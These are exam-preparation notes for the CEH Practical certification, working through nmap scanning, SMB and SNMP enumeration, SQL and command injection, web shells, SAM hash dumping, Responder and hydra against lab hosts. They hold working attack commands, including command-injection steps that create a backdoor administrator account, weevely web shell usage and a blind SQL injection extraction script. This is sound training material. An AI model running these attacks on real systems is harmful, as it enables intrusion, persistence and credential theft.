:::warning
Exam procedure [[details](https://hackmd.io/@nfu-johnny/SyzXWPp5A)]
1. Receive the e-mail and click the meeting-room link
2. Install the desktop meeting client and enter the meeting room
3. The proctor asks you to show two forms of ID to the camera and pan around the room
4. The proctor asks you to open the Control Panel
5. The proctor asks you to open the Aspen page and gives you a set of credentials to log in to the exam platform
:::

:::info
* Book a time with the vendor; the exam is a 6-hour lab (20 questions, at least 14 must be passed)
* CEH is the written exam, CEH Practical (CEHP) is the hands-on exam; passing both earns CEH Master
* CEH and CEH Master are on the certification list of the National Institute of Cyber Security (資安院)
* CEHP is not, so passing only CEHP is not recognised
* Relevance of the CEHv12 textbook chapters: 01, 02, 09 and 19 can be skipped; for 10, focus mainly on the traffic-analysis part
* The exam environment provides only two machines: Windows and Parrot
* Exam site: https://proctor.examspecialists.com/
* [Security certification roadmap](https://pauljerimy.com/security-certification-roadmap/)
* Experience reports
  * [Certified Ethical Hacker Practical Exam Guide](https://medium.com/techiepedia/certified-ethical-hacker-practical-exam-guide-dce1f4f216c9)
  * [EC-Council CEH Practical / Master preparation notes: learning where theory and practice reinforce each other](https://medium.com/blacksecurity/ceh-practical-master-3e80cac180a2)
  * [EC-Council CEHP exam preparation notes](https://hackmd.io/@9dCJrgb6QHGd8dRfgHO0zg/r14xNn1po)
  * [EC-Council CEH Practical preparation and exam notes](https://austinstunia.medium.com/ec-council-ceh-practical-%E6%BA%96%E5%82%99%E5%8F%8A%E8%80%83%E8%A9%A6%E5%BF%83%E5%BE%97-1eeac92e6855)
* Cheat sheets
  * [CEH-Practical-Notes](https://github.com/infovault-Ytube/CEH-Practical-Notes)
  * [CEH-Practical-Notes-and-Tools](https://github.com/DarkLycn1976/CEH-Practical-Notes-and-Tools)
  * [CEH-v12-Practical](https://github.com/hunterxxx/CEH-v12-Practical)
  * [CTFDemo](https://github.com/brucelyc/CTF_Memo)
  * [Everything You Need](https://github.com/dhabaleshwar/CEHPractical/blob/main/Everything%20You%20Need.md)
  * [AK0M01/Ceh-Practical](https://github.com/AK0M01/Ceh-Practical)
  * [Certified Ethical Hacker (C|EH)(Practical)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical)
* Reference videos
  * [How To Pass CEH Practical V12 Questions Solved](https://youtu.be/R9ZPkpKkzEA?si=xcENBWsaNikGjNxp)
  * [CEHv12 Complete Playlist](https://youtube.com/playlist?list=PLZFqXXGzox9mcgT_eMh1Jt-bbD_5kY_u-&si=Gu1vlLBEi17C8gGj)
  * [CEHv12 LABS](https://www.youtube.com/playlist?list=PLQutQhatpiPdi3acYayu9mSnKXDuLMuD1)
  * [CEH Practical Complete Playlist](https://www.youtube.com/playlist?list=PLZEA2EJpqSWfouVNPkl37AWEVCj6A2mdz)
  * [CEHv12 Practical ILabs Walkthroughs](https://youtube.com/playlist?list=PL-Fa25Pu8l6wV1Se-bPY-Onc6t_mUTZHW&si=L4bsIVfjnWWgqQjU)
:::

* The course material is divided into four topics

## 1. Scanning and Enumeration

:::info
Corresponds to CEH textbook chapters 3 to 5

Module 3 - Scanning
* Scanning tools are used to scan and identify ==live hosts==, ==open ports==, ==running services on a target network==, ==location info==, ==NetBIOS info==, and ==information about all TCP/IP and UDP open ports==.
* **Nmap** ("Network Mapper") is a security scanner for network exploration and hacking.
* Hping3 is a command-line-oriented network scanning and packet crafting tool for the TCP/IP protocol that sends ICMP echo requests and supports TCP, UDP, ICMP, and raw-IP protocols.
* Metasploit

Module 4 - Enumeration

Module 5 - Vulnerability Analysis
:::

* Tool: nmap
* Scenario: locating targets across different subnets
* Syntax: `nmap <options> <Target IP address>`

### 1-1 Host Discovery

:::info
* Host discovery is the first step in network scanning.
* Host discovery provides an accurate status of the systems in the network, which enables an attacker to avoid scanning every port on every system in a list of IP addresses to identify whether the target host is up.
:::

**Course commands**
```bash
# On the local subnet nmap uses an ARP scan by default; to force ICMP ping, TCP ping or UDP ping, pass the corresponding option
nmap -sn 10.10.10.*
# The host count differs from the run above: as root, the gateway network device also shows up
sudo nmap -sn 10.10.10.*
# ip route shows the gateway's IP
ip route
# --reason shows why each host was judged up
nmap -sn 10.10.10.* --reason
sudo nmap -sn 10.10.10.* --reason
# --packet-trace shows every probe and reply
sudo nmap -sn 10.10.10.* --packet-trace
sudo nmap -sn scanme.nmap.org --packet-trace
```
![image](https://hackmd.io/_uploads/HkWE3tXvR.png)
![image](https://hackmd.io/_uploads/HJUBkcmvC.png)

### 1-2 Port Scanning

:::info
Port scanning is the process of scanning system ports to recognize open ones. It attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server.
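Triaging the results of the scans in 1-1 to 1-3 by eye is slow when the subnet has many hosts and the exam clock is running. The script below is an added example (not from the course material) that parses nmap's XML output (`-oX`) and answers the typical exam questions directly: which host has a given port profile open (the WAMP case, 80 + 3306), which host runs a given service version, and which host has 5555 (ADB) open. The embedded XML is constructed by hand to look like a `nmap -sV -oX` result; every host, hostname, port and version in it is made up.

```python
"""Triage targets from nmap XML output (added example, not from the course material).

Run the scans from 1-1 to 1-3 with -oX and feed the file to this script:
    sudo nmap -sV -p80,445,3306,5555 -oX scan.xml 10.10.10.0/24
    python3 nmap_triage.py scan.xml
The XML below is constructed by hand to look like such a result for a small
lab subnet; the hosts, ports, hostnames and versions in it are made up.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_XML = """
<nmaprun scanner="nmap" args="nmap -sV -p80,445,3306,5555 -oX scan.xml 10.10.10.0/24">
  <host><status state="up" reason="arp-response"/>
    <address addr="10.10.10.9" addrtype="ipv4"/>
    <hostnames><hostname name="wamp-server" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.41"/></port>
      <port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.31"/></port>
      <port protocol="tcp" portid="445"><state state="closed" reason="reset"/></port>
    </ports>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="10.10.10.16" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" product="Windows Server 2019 microsoft-ds"/></port>
      <port protocol="tcp" portid="80"><state state="filtered" reason="no-response"/></port>
    </ports>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="10.10.10.14" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="5555"><state state="open" reason="syn-ack"/>
        <service name="freeciv"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="10.10.10.20" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

def parse_hosts(xml_text):
    """Map each live host to its hostname and {open port: service label}."""
    hosts = {}
    for host in ET.fromstring(xml_text.strip()).iter("host"):
        if host.find("status").get("state") != "up":
            continue                       # host discovery says down: skip
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        hn = host.find("hostnames/hostname")
        open_ports = {}
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue                   # closed/filtered ports are noise here
            svc = port.find("service")
            parts = [] if svc is None else [svc.get("name"), svc.get("product"), svc.get("version")]
            open_ports[int(port.get("portid"))] = " ".join(p for p in parts if p)
        hosts[ip] = {"hostname": hn.get("name") if hn is not None else None, "open": open_ports}
    return hosts

def hosts_with_ports(hosts, *required):
    """IPs on which every required port is open, e.g. (80, 3306) for the WAMP question."""
    return sorted(ip for ip, h in hosts.items() if set(required) <= set(h["open"]))

def hosts_running(hosts, keyword):
    """IPs whose service banner contains keyword, e.g. 'Apache httpd 2.4.41' to look up on exploit-db."""
    return sorted(ip for ip, h in hosts.items()
                  if any(keyword.lower() in s.lower() for s in h["open"].values()))

if __name__ == "__main__":
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    found = parse_hosts(xml_text)
    for ip, h in sorted(found.items()):
        print(ip, h["hostname"] or "-", ", ".join(f"{p}/{s}" for p, s in sorted(h["open"].items())))
    print("WAMP candidates:", hosts_with_ports(found, 80, 3306))
    print("ADB candidates:", hosts_with_ports(found, 5555))
```

Only ports in state `open` are kept; `filtered` means a firewall dropped the probe, which is exactly the case where `--reason` in the commands above tells you what happened. A `-sV` scan is needed for the product/version strings; a plain `nmap -p...` run yields only the service name.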
If attackers recognize an unused open port, they can exploit it to intrude into the system.
:::

**Course commands**
```bash
# Scan the common ports
nmap 10.10.10.9
# Scan all 65535 ports
nmap -p- 10.10.10.9
# UDP scans need sudo
sudo nmap 10.10.10.16 -sU -p53,137-139,161,1900,5353
# Suggested scan for the WAMP scenario (8080 may also need scanning) (exam point)
nmap -p80,3306 10.10.10.* --open --reason
nmap -p80,3306 10.10.10.* --open --reason --packet-trace
```
![image](https://hackmd.io/_uploads/BJOp7qQD0.png)
![image](https://hackmd.io/_uploads/ByRUEqmvR.png)

Less common ports
![image](https://hackmd.io/_uploads/rk8bxcXD0.png)

### 1-3 Service and OS Discovery

> /usr/share/nmap/nmap-os-db (nmap's OS fingerprint database)

**Course commands**
```bash
sudo nmap 10.10.10.16 -O
sudo nmap 10.10.10.9 -O
# Use the detected service version to look for an exploit (exploit-db) or to pair it with Metasploit
# e.g. search for "apache 2.4.41 vulnerability exploitdb"
sudo nmap 10.10.10.9 -p80 -sV
sudo nmap 10.10.10.9 -p80 -A
# Find AD hosts (LDAP / LDAPS)
sudo nmap 10.10.10.* -p389,636 --open
# Find the Domain Controller's FQDN (exam point)
sudo nmap 10.10.10.16 -p445,389 -A
sudo nmap 10.10.10.16 -p445,3389 -sVC
# The precise approach from the CEH text: smb-os-discovery returns the FQDN directly
sudo nmap 10.10.10.16 --script smb-os-discovery
```
> ![image](https://hackmd.io/_uploads/rJ7kNY9vC.png)
> Identifying a Windows OS: `nmap --script smb-os-discovery <target>`
> ![image](https://hackmd.io/_uploads/r1gmmBcPR.png)
> (Own addition) On an AD host, the DC list can be queried with
> `nltest /dclist:<domain_name>`
> ![image](https://hackmd.io/_uploads/BkyDEB9w0.png)

### 1-4 Enumeration

:::info
Mainly combines the following CEH textbook topics
* Module 04 - Enumeration: SNMP Enumeration (snmp-win32-users), SMB Enumeration (enum4linux)
* Module 06 - System Hacking: Password-Cracking Tools (THC-Hydra), Password Spraying Attack (CrackMapExec)
:::

> [Felo search - the krbtgt account](https://felo.ai/search/oXGqXU39bwnfPckqaye-V)
> [Quick Tutorial: SNMP Enumeration](https://allabouttesting.org/quick-tutorial-snmp-enumeration/)
> [Hydra-Cheatsheet](https://github.com/frizb/Hydra-Cheatsheet)

**Course commands**
```bash
sudo nmap -sU -p161 --open 10.10.10.*
sudo nmap -sU -p161 -sC 10.10.10.16
sudo nmap -sU -p161 --script snmp-win32-users 10.10.10.16
# Put the user accounts found into a file named win32-users.txt
nbtscan 10.10.10.1-254
enum4linux 10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst smb://10.10.10.16
enum4linux -u martin -p apple -a 10.10.10.16 > day1lab4
# Check that the impacket package is version 0.10 or newer
python3 -m pip list | grep impacket
# Upgrade the package so that CrackMapExec works
python3 -m pip install --upgrade impacket
# Enumerating SMB shares
crackmapexec smb 10.10.10.16 -u martin -p apple --shares
```
> impacket must be 0.10 or newer to be usable
> ![image](https://hackmd.io/_uploads/Hys0MCDPR.png)
> All nmap NSE scripts live in `/usr/share/nmap/scripts/`
> Searching that directory for snmp finds the scripts SNMP enumeration may need
> ![image](https://hackmd.io/_uploads/r1xIh2wDC.png)
> Searching for smb-enum likewise finds the scripts for SMB enumeration
> ![image](https://hackmd.io/_uploads/SyQZp3PvR.png)
> [CrackMapExec in Action: Enumerating Windows Networks (Part 1)](https://medium.com/r3d-buck3t/crackmapexec-in-action-enumerating-windows-networks-part-1-3a6a7e5644e9)
> [CrackMapExec in Action: Enumerating Windows Networks (Part 2)](https://medium.com/r3d-buck3t/crackmapexec-in-action-enumerating-windows-networks-part-2-c61dfb7cd88e)

Put the user accounts found into win32-users.txt
![image](https://hackmd.io/_uploads/HJ7D3smDR.png)
Found jason/qwerty, martin/apple, shiela/test
![image](https://hackmd.io/_uploads/rkpoAjXwA.png)
![image](https://hackmd.io/_uploads/B1-ex3mPA.png)

:::success
`hydra -h` shows how each option is used
Upper-case options are usually followed by a wordlist file, lower-case options by a known literal value
Username with `-L` or `-l`, password with `-P` or `-p`
![image](https://hackmd.io/_uploads/H1JTTTDDC.png)
:::

:::info
* Module 04 - Enumeration
  * [Enumerating SMTP Servers with NMAP](https://medium.com/@minimalist.ascent/enumerating-smtp-servers-with-nmap-2a92c7b2c8de)
  * [SMTP server ETRN command not restricted](https://zeroday.hitcon.org/vulnerability/ZD-2025-00812)
  * Simple Network Management Protocol (SNMP) allows network administrators to manage network devices from a remote location.
  * It is an application-layer protocol that runs on UDP.
  * SNMP has many security vulnerabilities, such as a lack of auditing.
  * SNMP enumeration is the process of ==creating a list of the user's accounts and devices== on a target computer using SNMP.
  * SNMP employs two types of software components for communication: the SNMP agent and SNMP management station. ==The agent receives requests on port 161 from the managers== and responds to the managers on port 162. (More precisely, UDP 162 is where the manager listens for traps sent by agents; replies to queries go back to whatever source port the manager used, which is why the enumeration above only needs UDP 161 open.)
  * Server Message Block (SMB) is a transport protocol that is generally used by Windows systems for providing shared access to files, printers, and serial ports as well as remote access to Windows services.
  * By default, SMB runs directly on TCP port 445 or via the NetBIOS API on UDP ports 137 and 138 and TCP ports 137 and 139.
  * By using the SMB service, users can access files and other data stored at a remote server.
  * The SMB service also allows application users to read, write, and modify the files on the remote server.
  * A network running this service is highly vulnerable to SMB enumeration, which provides a good amount of information about the target.
  * Attackers can use SMB enumeration tools such as Nmap, SMBMap, ==enum4linux==, nullinux, and NetScanTool Pro to perform a directed scan on the SMB service running on port 445.
  * ==Enum4linux== is a tool for ==enumerating information from Windows== and Samba systems.
* Module 06 - System Hacking
  * A password spraying attack targets multiple user accounts simultaneously using one or a small set of commonly used passwords.
  * Attackers use the CrackMapExec tool to automate the password cracking process of an entire domain or workgroup member passwords using a small set of commonly used passwords stored in a .txt file.
:::

## 2. Injection Attacks

:::info
Covers chapters 13 to 15
:::

### 2-1 IDOR

:::info
Refer to the CEH Lab exercise for chapter 14, Task 2: Perform Parameter Tampering using Burp Suite
* Insecure Direct Object Reference (IDOR) is a vulnerability that arises when developers disclose references to internal implementation objects such as database keys, directories, and other files, which can be exploited by an attacker to modify the references and gain unauthorized access to the data.
These IDORs can be bypassed by providing a single parameter name repeatedly but with unique values (HTTP parameter pollution).
:::

Target: http://10.10.10.19/moviescope
![image](https://hackmd.io/_uploads/S1-qz37P0.png)

### 2-2 SQL Injection

:::info
Refer to the CEH Lab exercise for chapter 15, Task 2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap
* Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
* You can use sqlmap to perform SQL injection on a target website using various techniques, including Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band SQL injection.
* [sqlmap](https://github.com/sqlmapproject/sqlmap)
* [Damn Small SQLi Scanner](https://github.com/stamparm/DSSS)
:::

* Exercise 1 reveals the injection point
* sqlmap can then be used to pull the data
```bash
# The session cookie can be read in the browser developer-tools console with document.cookie
sqlmap -u "<injection URL>" --cookie="<session cookie>"
# Enumerate databases
sqlmap -u "<injection URL>" --cookie="<session cookie>" --dbs
# Enumerate tables
sqlmap -u "<injection URL>" --cookie="<session cookie>" -D <database> --tables
# Get the table structure
sqlmap -u "<injection URL>" --cookie="<session cookie>" -D <database> -T <table> --columns --technique=B
# Dump the table contents
sqlmap -u "<injection URL>" --cookie="<session cookie>" -D <database> -T <table> --dump --technique=B
```
![image](https://hackmd.io/_uploads/HkSFLnQw0.png)
* Without `--technique=B` (boolean-based blind only) the output comes back garbled
![image](https://hackmd.io/_uploads/SyHk9hmvC.png)
* Addition: for RCE, add the `--os-shell` option
* DVWA's SQL Injection: practise on your own

### 2-3 Command Injection

:::info
Refer to the CEH Lab exercise for chapter 14, Task 7: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server
:::

> [Felo search - enabling the RDP service from CMD](https://felo.ai/search/Em-7ro4GpOt0poDWwefDp)

**Course commands**
```
# Chain a command onto the input with the pipe character
| whoami
# Add an account
| net user cehp /add
# Set its password
| net user cehp password
# Confirm the new account exists
| net user
# Add the backdoor account to the Administrators group
| net localgroup Administrators cehp /add
# Enable the RDP service (Google keywords: cmd enable rdp service)
| reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Use netstat to check that the service is now listening
| netstat -an | findstr :3389
# Then connect directly over RDP
```
Caveat: `fDenyTSConnections` only turns on the Terminal Services listener; if 3389 shows as listening but the RDP client still cannot connect, the Windows Firewall "Remote Desktop" rule group also has to be enabled.
![image](https://hackmd.io/_uploads/rJpcf6QwC.png)

### 2-4 WebShell

:::info
Refer to the CEH Lab exercise for chapter 14, Task 8: Exploit a File Upload Vulnerability at Different Security Levels
:::

```bash
# Generate a web shell with weevely (password "cehp")
weevely generate cehp backdoor.php
# After the upload succeeds, connect to it
weevely http://10.10.10.16:8080/dvwa/hackable/uploads/backdoor.php cehp
```
![image](https://hackmd.io/_uploads/SJFxaT7wR.png)
* Addition: Google "simple webshell"
> [joswr1ght/easy-simple-php-webshell.php](https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985)
![image](https://hackmd.io/_uploads/ryrpopXwA.png)

### 2-5 The wpscan tool

:::info
Refer to the CEH Lab exercise for chapter 14, Task 6: Enumerate and Hack a Web Application using WPScan and Metasploit
:::

* Target: http://10.10.10.16/ceh/
* This tool is aimed mainly at WordPress
```bash
whatweb http://10.10.10.16/ceh/
whatweb -v http://10.10.10.16/ceh/
```
![image](https://hackmd.io/_uploads/B1CN0T7PR.png)
* The wpscan tool
> [WordPress Vulnerability Testing with Nmap](https://blog.wpsec.com/wordpress-vulnerability-testing-wordpress-with-nmap/)
> [Exploiting WordPress Using WPScan](https://abrictosecurity.com/exploiting-wordpress-using-wpscan/)
```bash
# Show usage
wpscan -h
# Enumerate users (User IDs range)
wpscan --url http://10.10.10.16:8080/ceh -e u
# Password attack; the wordlist from CEH textbook chapter 14 finds admin's password
wpscan --url http://10.10.10.16:8080/ceh -U admin -P password.txt
```
![image](https://hackmd.io/_uploads/rkWny0Qw0.png)

### 2-6 The metasploit tool

> [Felo search - metasploit attack steps](https://felo.ai/search/wKAFLrU3VFEEWaZv2UOcS)
> [Metasploit Tutorial 2024: The Complete Beginners Guide](https://www.stationx.net/metasploit-tutorial/)
> [Metasploit For Beginners to Expert](https://youtu.be/bDg0kZ6v3vA?si=2BLOKhSqsRAmGMn9)
> [How to exploit port 80 HTTP on Kali Linux](https://youtu.be/WV4c8aSVXYs?si=PBYs9s1oBfHX5__G)
> CEH
> ![image](https://hackmd.io/_uploads/SJh7jSUPR.png)

```bash
sudo service postgresql start
msfconsole
```
![image](https://hackmd.io/_uploads/Bkl1VC7wA.png)
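Back to 2-2: the `--technique=B` option that makes the sqlmap dumps readable stands for boolean-based blind injection, and it helps to have seen once what sqlmap is actually doing behind that flag. The block below is an added example, not course material: a deliberately vulnerable lookup over an in-memory SQLite table (constructed data, standing in for the MovieScope page) serves as a true/false oracle, and `blind_extract` recovers a table name and then a password one character at a time, exactly as sqlmap's `--tables` and `--dump` do under `--technique=B`. The hardened variant with a bound parameter is shown beside it so the fix is visible too.

```python
"""Boolean-based blind SQL injection in miniature (added example, not course material).

The database and its rows are constructed for this example. SQLite's substr()
plays the role of MSSQL's SUBSTRING(); sqlmap picks the right function per DBMS.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'S3cr3t!'), (2, 'jason', 'qwerty');
CREATE TABLE movies(id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO movies VALUES (1, 'Heat'), (2, 'Alien');
""")

def movie_vulnerable(movie_id: str) -> bool:
    """Vulnerable: the request parameter is concatenated into the SQL text.
    Returns True when the page would render a movie; that yes/no is the oracle."""
    sql = f"SELECT title FROM movies WHERE id = {movie_id}"
    return conn.execute(sql).fetchone() is not None

def movie_fixed(movie_id: str) -> bool:
    """Hardened: the value is bound as a parameter and type-checked first,
    so the same payload is just an invalid id."""
    try:
        row = conn.execute("SELECT title FROM movies WHERE id = ?", (int(movie_id),)).fetchone()
    except ValueError:
        return False
    return row is not None

CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*.-"

def blind_extract(oracle, subquery: str, max_len: int = 32) -> str:
    """Recover the single-row result of `subquery` through a true/false oracle.

    For each position, try every character until the injected condition
    `substr((subquery), pos, 1) = 'c'` makes the page render; when no character
    matches, the string has ended. This is one oracle call per guess, which is
    why blind extraction is slow and why sqmap shows a progress counter."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = f"1 AND substr(({subquery}),{pos},1)='{ch}'"
            if oracle(payload):
                out += ch
                break
        else:
            return out
    return out

if __name__ == "__main__":
    table = blind_extract(movie_vulnerable,
                          "SELECT name FROM sqlite_master WHERE type='table' AND name!='movies'")
    print("hidden table:", table)
    print("admin password:", blind_extract(movie_vulnerable,
                                           f"SELECT password FROM {table} WHERE username='admin'"))
    print("same attack against the fixed endpoint:",
          repr(blind_extract(movie_fixed, "SELECT password FROM users WHERE username='admin'")))
```

Each recovered character costs up to `len(CHARSET)` requests; sqlmap cuts this down with a binary search over character codes, but the principle is the same, which is also why a noisy page (varying content, rate limiting) breaks boolean-based blind detection and forces the time-based technique instead.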
![image](https://hackmd.io/_uploads/rkEY4RXwA.png)
![image](https://hackmd.io/_uploads/r1LnN0mDC.png)
* Setting up the vulnerable plugin
> [Photo Gallery <= 1.2.5 - Unrestricted File Upload](https://wpscan.com/vulnerability/c2b4aec5-1f23-443e-a0fc-1237778893e1/)
> First download and install the vulnerable 1.2.5 version of the plugin
![image](https://hackmd.io/_uploads/r1mKuRmD0.png)
![image](https://hackmd.io/_uploads/rJR6_07wA.png)
![image](https://hackmd.io/_uploads/HkmLKR7DC.png)
![image](https://hackmd.io/_uploads/r1DuKCQwC.png)

### 2-7 Addition: Android devices

:::info
![image](https://hackmd.io/_uploads/SkabciOwR.png)
:::

> Not in the printed material; this is a new question type
> Android Debug Bridge (ADB)
> [Basic adb usage tutorial](https://shengyu7697.github.io/android-adb/)

```bash
# Find hosts with the ADB port open
nmap -p5555 10.10.10.* --open
# No installation is needed in the exam
sudo apt install -y adb
adb connect 10.10.10.14:5555
adb devices
adb shell
```
![image](https://hackmd.io/_uploads/S1kG1k4DA.png)
On the Android VM, use Cx File Explorer to create flag.txt in the Download folder (in the exam the file name is given; you do not create the file yourself)
![image](https://hackmd.io/_uploads/ByxtbJEw0.png)
In the exam you are asked for the first or last few characters of the hash
![image](https://hackmd.io/_uploads/HJcixkED0.png)

## 3. Password Cracking

:::info
CEH chapter 6
:::

### 3-1 Operating Systems

* ==Windows==

:::info
* [LM, NTLM, Net-NTLMv2, oh my!](https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4)
* Windows uses the Security Accounts Manager (SAM) database or Active Directory Database to manage user accounts and passwords in hashed format (a one-way hash).
> ![image](https://hackmd.io/_uploads/By0xSFSD0.png)
* The SAM file is stored at %SystemRoot%/system32/config/SAM on Windows systems
* It stores LM or NTLM hashed passwords.
* The SAM file uses the SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.
* NT LAN Manager (NTLM) is a default authentication scheme that performs authentication using a challenge/response strategy.
* To crack LM hashes using John the Ripper
```bash
# --show only lists hashes already cracked into john.pot; run the same command without --show first to do the cracking
john --format=LM --show hashfile.txt
```
:::

> [(Own addition) Dumping Hashes from SAM via Registry](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry)
> [ophcrack - Free Rainbow tables](https://ophcrack.sourceforge.io/tables.php)
> These files should be located in `C:\windows\system32\config\SAM` and `C:\windows\system32\config\SYSTEM`. But you cannot just copy them in the regular way because they are protected (locked by the kernel while Windows is running).
> * On the Win10 host: the easiest way to steal those files is to get a copy from the registry:
```
# Switch to the e:\CEH-Tools folder (the shared folder)
e:
cd CEH-Tools
# Create a folder for the dump
mkdir pwdump
# Export the account database (SAM hive)
reg save hklm\sam pwdump\sam
# Export the SYSTEM hive (it holds the boot key needed to decrypt the SAM)
reg save hklm\system pwdump\system
```
![image](https://hackmd.io/_uploads/B1JVnaNDA.png)
> ![image](https://hackmd.io/_uploads/S1Fz6OHD0.png)

* On the Parrot host
> [(Own addition) Dumping credentials with impacket-secretsdump](https://vk9-sec.com/active-directory-dumping-credentials-with-impacket-secretsdump/)
```bash
# On Parrot, first copy the pwdump folder from the shared folder into the home directory
impacket-secretsdump LOCAL -system pwdump/system -sam pwdump/sam -outputfile pwdump/10.10.10.10
# Then copy the exported pwdump/10.10.10.10 back into the shared folder
```
![image](https://hackmd.io/_uploads/SJ90aaVvA.png)

* On the Win10 host, the course material uses ophcrack
![image](https://hackmd.io/_uploads/SyotA6VvA.png)
![image](https://hackmd.io/_uploads/B10c0p4DA.png)
![image](https://hackmd.io/_uploads/r1CjA64PR.png)
![image](https://hackmd.io/_uploads/ByDaApVvR.png)
* Load > PWDUMP file > click Crack to start cracking
![image](https://hackmd.io/_uploads/ByGx10VD0.png)
![image](https://hackmd.io/_uploads/SymPUCVP0.png)
* Online tools can also help
  * Google keywords: `ntlm crackstation`
![image](https://hackmd.io/_uploads/HkDWiT4PC.png)
![image](https://hackmd.io/_uploads/B1X7g04DC.png)
![image](https://hackmd.io/_uploads/HkYTg04wR.png)

* ==Linux== - john the ripper
  * Make your own hashes to practise on
```bash
# -n keeps the newline out of the hashed input; -f1 keeps only the hex digest
echo -n hello | md5sum | cut -d ' ' -f1 >> md5.txt
echo -n apollo | md5sum | cut -d ' ' -f1 >> md5.txt
echo -n tiger | md5sum | cut -d ' ' -f1 >> md5.txt
```
  * Use john
```bash
# Without a format john cannot tell which of the many 32-hex-digit hash types this is
john md5.txt
# Specify the format
john md5.txt --format=raw-md5
```

:::success
* [The CEHv12 textbook mentions a privilege-escalation method that drops a bash binary over NFS](https://youtu.be/uMUnnRrV3HI?si=Wp0Fpmc5eZCuhcHP)
> [SUID privilege escalation](https://blog.csdn.net/weixin_46329243/article/details/134481631)
> [Privilege Escalation Basics](https://youtu.be/VuIYNxazbN0?si=HXlegejrNbOqQ6F5)
> [Privilege Escalation Advance](https://youtu.be/eba6zIDzfPg?si=ktAbAEKTga6atK-K)
* Useful commands for privilege escalation
```bash
# Display the world-executable directories
find / -perm -o=x -type d 2>/dev/null
# Display the files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
```
* Extra scenario: cracking the passwords of the other accounts on the system
> [Felo search - unshadow is a helper that ships with John the Ripper](https://felo.ai/search/tuucAn0gAciOlOUnh4_M0)
> ![image](https://hackmd.io/_uploads/B1kskUjwA.png)
```
sudo su
unshadow /etc/passwd /etc/shadow > mypasswd
# run "john mypasswd" first to crack; --show then lists what was recovered
john mypasswd --show
```
:::

### 3-2 Network Protocols

* Cracking NetBIOS network logon passwords - Responder (older question)

:::info
![image](https://hackmd.io/_uploads/B1Av1jLvR.png)
* NBT-NS (NetBIOS Name Service) itself runs on UDP 137; the SMB session it leads to uses TCP 139 (NetBIOS session service) or, on current systems, TCP 445 directly, which is the preferred port today.
* LLMNR (Link-Local Multicast Name Resolution) is regarded as the successor of NBT-NS.
* LLMNR/NBT-NS is a name-resolution mechanism for local networks: the requester sends a multicast query over UDP, and the query is confined to the local segment.
> It is not a replacement for DNS; it is a fallback used when the DNS lookup fails, which is exactly what a poisoner answers
* Attackers use Responder to capture information from the victim system, e.g. OS version, client version, NTLM client IP address, NTLM username, and password hash.
* Responder is an LLMNR, NBT-NS, and MDNS poisoner. By default, the tool only responds to a File Server Service request, which is for SMB.
:::

> [Gaining Credentials Easily with Responder Tool](https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b)
> [Local Network Attacks: LLMNR and NBT-NS Poisoning Background](https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning/)
> [(Own addition) SNIFFING AND CRACKING NTLM HASHES](https://hackmd.io/@EvilOrez/ntlm)

* On Parrot
```
sudo responder -I eth0
```
![image](https://hackmd.io/_uploads/HJRK_REvR.png)
* On Win10
![image](https://hackmd.io/_uploads/B1V1FCEvC.png)
When the logon fails, a logon dialog appears; enter supersuper/Password1

:::success
Addition
![image](https://hackmd.io/_uploads/BJo250VP0.png)
:::

* On Parrot
![image](https://hackmd.io/_uploads/BkyMKCVwC.png)
```bash
# Responder's logs are in /usr/share/responder/logs/
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
# Prepare the wordlist
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
# Crack
# john --wordlist=<wordlist> <file containing the captured hashes>
john --wordlist=/usr/share/wordlists/rockyou.txt /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
```
* (Side note) LLMNR/NBT-NS is insecure; LLMNR can be turned off through local Group Policy and NBT-NS through the network adapter settings.

* FTP protocol - hydra
> Uses the wordlists from CEH-Tools chapter 13
![image](https://hackmd.io/_uploads/H1EWekBDR.png)
```bash
# Find hosts with FTP open
nmap -p21 10.10.10.* --open
hydra -L Wordlists/Usernames.txt -P Wordlists/Passwords.txt ftp://10.10.10.10
ftp 10.10.10.10
```
